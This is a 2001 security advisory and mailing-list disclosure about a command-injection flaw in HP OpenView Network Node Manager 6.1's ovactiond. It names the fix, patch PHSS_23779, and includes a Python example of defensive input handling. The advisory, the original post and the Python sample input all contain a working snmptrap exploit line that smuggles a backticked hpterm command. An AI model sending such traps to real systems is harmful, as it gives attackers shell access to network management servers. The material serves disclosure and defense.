HP's OpenView Network Node Manager Gives Remote Users Shell Access with User-level (bin) Privileges

SecurityTracker Alert ID: 1001711
SecurityTracker URL: http://securitytracker.com/id/1001711
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jun 8 2001
Impact: Execution of arbitrary code via network, User access via network
Fix Available: Yes
Vendor Confirmed: Yes
Exploit Included: Yes
Version(s): 6.1

Description:
A vulnerability has been reported in the "ovactiond" module of HP's OpenView Network Node Manager (NNM). It allows a remote user to obtain "bin" user-level access to the network management server.

The module is designed to start any executable program when a trap or event is received by Network Node Manager.

In the trapd.conf file, the following configuration is reportedly defined by default in NNM 6.1:

#
EVENT OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.60000208 "Configuration Alarms" Warning
FORMAT Generic NNM to MgX message. $12
EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1 $10 1.3.[snip...]
#

If a remote user sends the following trap, the remote user can reportedly obtain remote terminal access with "bin" user privileges:

snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""

Impact:
A remote user can execute arbitrary commands on the server with the "bin" user-level privileges and can obtain shell access to the network management server.

Solution:
The vendor has released a patch (PHSS_23779). The patch reportedly checks for 'strange' characters in the input strings received through the event or trap.
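
The flaw class described here, trap varbind text spliced into a command string that a shell then parses, is shown below next to two mitigations: rejecting shell metacharacters (the kind of check the advisory attributes to PHSS_23779) and building an argument vector from the trusted template. This is an added Python example, not HP's code; the function names, the metacharacter set and the sample varbinds are assumptions constructed for illustration.

```python
import re
import shlex

# Assumed deny-list of characters a POSIX shell treats specially. The advisory
# only says the patch rejects 'strange' characters; this exact set is a guess.
SHELL_META = re.compile(r"[`$;&|<>(){}\[\]\\'\"!*?~#\n\r]")
PLACEHOLDER = re.compile(r"\$(\d+)")


def expand_unsafe(template, varbinds):
    """Vulnerable pattern: splice varbind text into a string later given to a shell."""
    return PLACEHOLDER.sub(lambda m: varbinds.get(int(m.group(1)), ""), template)


def unsafe_varbinds(varbinds):
    """Return the varbind numbers whose values contain shell metacharacters."""
    return sorted(n for n, v in varbinds.items() if SHELL_META.search(v))


def build_argv(template, varbinds):
    """Hardened pattern: tokenise the trusted template first, then substitute.

    Each varbind value stays inside a single argv element, so running the
    result without a shell (e.g. subprocess.run(argv, shell=False)) never
    lets a shell parse data that arrived in the trap.
    """
    bad = unsafe_varbinds(varbinds)
    if bad:
        raise ValueError(f"rejected varbinds {bad}: shell metacharacters")
    return [PLACEHOLDER.sub(lambda m: varbinds.get(int(m.group(1)), ""), tok)
            for tok in shlex.split(template)]


# Constructed sample input. TEMPLATE is the visible part of the EXEC line quoted
# in the advisory (the rest is snipped there); the varbind values are made up,
# with the backtick string taken from the trap shown in the advisory.
TEMPLATE = "echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1 $10"
BENIGN = {10: "router-7.example.net"}
HOSTILE = {10: "`/usr/bin/X11/hpterm -display <your client display>`"}

if __name__ == "__main__":
    print("string a shell would parse:", expand_unsafe(TEMPLATE, HOSTILE))
    print("flagged varbinds:", unsafe_varbinds(HOSTILE))
    print("argv for benign trap:", build_argv(TEMPLATE, BENIGN))
```
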

Vendor URL: www.hp.com/

Cause: Input validation error, State error

Underlying OS: UNIX (Any)

Message History:
This archive entry has one or more follow-up message(s) listed below.

Source Message Contents

Date: 8 Jun 2001 06:12:07 -0000
Subject: HP Openview NNM6.1 ovactiond bin exploit

Hello,

Summary:
HP Openview NNM6.1 and earlier running on Unix have a problem with the suid bin executable ovactiond. It allows for starting of any program by just sending a trap or event to the station running the daemon.

Details:
In the trapd.conf the following is defined by default (NNM6.1):

#
EVENT OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.60000208 "Configuration Alarms" Warning
FORMAT Generic NNM to MgX message. $12
EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1 $10 1.3.[snip...]
#

By sending this trap:

snmptrap -v 1 <NNM host> .1.3.6.1.4.1.11.2.17.1 1.2.3.4 6 60000208 0 1 s "" 2 s "" 3 s "\`/usr/bin/X11/hpterm -display <your client display>\`" 4 s "" [snip...] 12 s ""

You get an hpterm on your client display running under user bin on the NNM server. The reason is that NNM first completes the command under the EXEC and then starts that in a shell.

Patch:
The patch to install is PHSS_23779 and is default in all newest patch releases of NNM. This patch checks for 'strange' characters in the input strings received through the event or trap.

MAG,
Milo

PS: moderator, please inform me why you do/did not place this message...